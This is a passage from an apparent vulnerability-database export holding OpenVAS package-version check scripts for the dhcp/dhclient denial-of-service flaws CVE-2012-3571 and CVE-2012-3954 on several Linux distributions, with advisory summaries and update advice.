Test\n#\n# CentOS Update for dhclient CESA-2012:1140 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-August/018783.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881457\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 11:16:44 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-3571\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2012:1140\");\n script_name(\"CentOS Update for dhclient CESA-2012:1140 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dhclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"dhclient on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n A denial of service flaw was found in the way the dhcpd daemon handled\n zero-length client identifiers. A remote attacker could use this flaw to\n send a specially-crafted request to dhcpd, possibly causing it to enter an\n infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\n Upstream acknowledges Markus Hietava of the Codenomicon CROSS project as\n the original reporter of this issue.\n\n Users of DHCP should upgrade to these updated packages, which contain a\n backported patch to correct this issue. After installing this update, all\n DHCP servers will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client\", rpm:\"libdhcp4client~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libdhcp4client-devel\", rpm:\"libdhcp4client-devel~3.0.5~31.el5_8.1\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:1361412562310881463", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881463", "type": "openvas", "title": "CentOS Update for dhclient CESA-2012:1141 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dhclient CESA-2012:1141 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2012-August/018785.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881463\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 11:17:06 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2012:1141\");\n script_name(\"CentOS Update for dhclient CESA-2012:1141 centos6\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dhclient'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS6\");\n script_tag(name:\"affected\", value:\"dhclient on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n A denial of service flaw was found in the way the dhcpd daemon handled\n zero-length client identifiers. A remote attacker could use this flaw to\n send a specially-crafted request to dhcpd, possibly causing it to enter an\n infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n\n Two memory leak flaws were found in the dhcpd daemon. A remote attacker\n could use these flaws to cause dhcpd to exhaust all available memory by\n sending a large number of DHCP requests. (CVE-2012-3954)\n\n Upstream acknowledges Markus Hietava of the Codenomicon CROSS project as\n the original reporter of CVE-2012-3571, and Glen Eustace of Massey\n University, New Zealand, as the original reporter of CVE-2012-3954.\n\n Users of DHCP should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing this update,\n all DHCP servers will be restarted automatically.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.1~31.P1.el6_3.1\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2017-12-04T11:20:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1519-1", "modified": "2017-12-01T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:841095", "href": "http://plugins.openvas.org/nasl.php?oid=841095", "type": "openvas", "title": "Ubuntu Update for isc-dhcp USN-1519-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1519_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for isc-dhcp USN-1519-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Markus Hietava discovered that the DHCP server incorrectly handled certain\n malformed client identifiers. A remote attacker could use this issue to\n cause DHCP to crash, resulting in a denial of service. (CVE-2012-3571)\n\n Glen Eustace discovered that the DHCP server incorrectly handled memory. A\n remote attacker could use this issue to cause DHCP to crash, resulting in a\n denial of service. (CVE-2012-3954)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1519-1\";\ntag_affected = \"isc-dhcp on Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 11.04\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1519-1/\");\n script_id(841095);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 11:18:54 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"USN\", value: \"1519-1\");\n script_name(\"Ubuntu Update for isc-dhcp USN-1519-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"isc-dhcp-server\", ver:\"4.1.ESV-R4-0ubuntu5.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"isc-dhcp-server\", ver:\"4.1.1-P1-17ubuntu10.3\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"isc-dhcp-server\", ver:\"4.1.1-P1-15ubuntu9.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2020-03-17T23:03:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120071", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120071", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2012-115)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120071\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:16:48 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2012-115)\");\n script_tag(name:\"insight\", value:\"A denial of service flaw was found in the way the dhcpd daemon handled zero-length client identifiers. A remote attacker could use this flaw to send a specially-crafted request to dhcpd, possibly causing it to enter an infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571 )Two memory leak flaws were found in the dhcpd daemon. A remote attacker could use these flaws to cause dhcpd to exhaust all available memory by sending a large number of DHCP requests. (CVE-2012-3954 )\");\n script_tag(name:\"solution\", value:\"Run yum update dhcp to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2012-115.html\");\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.1~31.P1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.1~31.P1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dhcp-debuginfo\", rpm:\"dhcp-debuginfo~4.1.1~31.P1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.1.1~31.P1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.1~31.P1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1519-1", "modified": "2019-03-13T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310841095", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841095", "type": "openvas", "title": "Ubuntu Update for isc-dhcp USN-1519-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1519_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for isc-dhcp USN-1519-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1519-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.841095\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 11:18:54 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"USN\", value:\"1519-1\");\n script_name(\"Ubuntu Update for isc-dhcp USN-1519-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(12\\.04 LTS|11\\.10|11\\.04)\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1519-1\");\n script_tag(name:\"affected\", value:\"isc-dhcp on Ubuntu 12.04 LTS,\n Ubuntu 11.10,\n Ubuntu 11.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Markus Hietava discovered that the DHCP server incorrectly handled certain\n malformed client identifiers. A remote attacker could use this issue to\n cause DHCP to crash, resulting in a denial of service. (CVE-2012-3571)\n\n Glen Eustace discovered that the DHCP server incorrectly handled memory. A\n remote attacker could use this issue to cause DHCP to crash, resulting in a\n denial of service. (CVE-2012-3954)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"isc-dhcp-server\", ver:\"4.1.ESV-R4-0ubuntu5.2\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"isc-dhcp-server\", ver:\"4.1.1-P1-17ubuntu10.3\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"isc-dhcp-server\", ver:\"4.1.1-P1-15ubuntu9.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "Oracle Linux Local Security Checks ELSA-2012-1141", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123850", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123850", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-1141", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-1141.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123850\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:09:23 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-1141\");\n script_tag(name:\"insight\", value:\"ELSA-2012-1141 - dhcp security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-1141\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-1141.html\");\n script_cve_id(\"CVE-2012-3954\", \"CVE-2012-3571\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"dhclient\", rpm:\"dhclient~4.1.1~31.P1.0.1.el6_3.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dhcp\", rpm:\"dhcp~4.1.1~31.P1.0.1.el6_3.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dhcp-common\", rpm:\"dhcp-common~4.1.1~31.P1.0.1.el6_3.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"dhcp-devel\", rpm:\"dhcp-devel~4.1.1~31.P1.0.1.el6_3.1\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2018-01-06T13:07:04", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-3954", "CVE-2012-3571"], "description": "Check for the Version of dhclient", "modified": "2018-01-04T00:00:00", "published": "2012-08-03T00:00:00", "id": "OPENVAS:881463", "href": "http://plugins.openvas.org/nasl.php?oid=881463", "type": "openvas", "title": "CentOS Update for dhclient CESA-2012:1141 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dhclient CESA-2012:1141 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows\n individual devices on an IP network to get their own network configuration\n information, including an IP address, a subnet mask, and a broadcast\n address.\n\n A denial of service flaw was found in the way the dhcpd daemon handled\n zero-length client identifiers. A remote attacker could use this flaw to\n send a specially-crafted request to dhcpd, possibly causing it to enter an\n infinite loop and consume an excessive amount of CPU time. (CVE-2012-3571)\n \n Two memory leak flaws were found in the dhcpd daemon. A remote attacker\n could use these flaws to cause dhcpd to exhaust all available memory by\n sending a large number of DHCP requests. (CVE-2012-3954)\n \n Upstream acknowledges Markus Hietava of the Codenomicon CROSS project as\n the original reporter of CVE-2012-3571, and Glen Eustace of Massey\n University, New Zealand, as the original reporter of CVE-2012-3954.\n \n Users of DHCP should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing this update,\n all DHCP servers will be restarted automatically.\";\n\ntag_affected = \"dhclient on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2012-August/018785.html\");\n script_id(881463);\n script_version(\"$Revision: 8285 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-04 07:29:16 +0100 (Thu, 04 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-03 11:17:06 +0530 (Fri, 03 Aug 2012)\");\n script_cve_id(\"CVE-2012-3571\", \"CVE-2012-3954\");\n script_tag(name:\"cvss_base\", value:\"6.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2012:1141\");\n script_name(\"CentOS Update for dhclient CESA-2012:1141 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dhclient\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 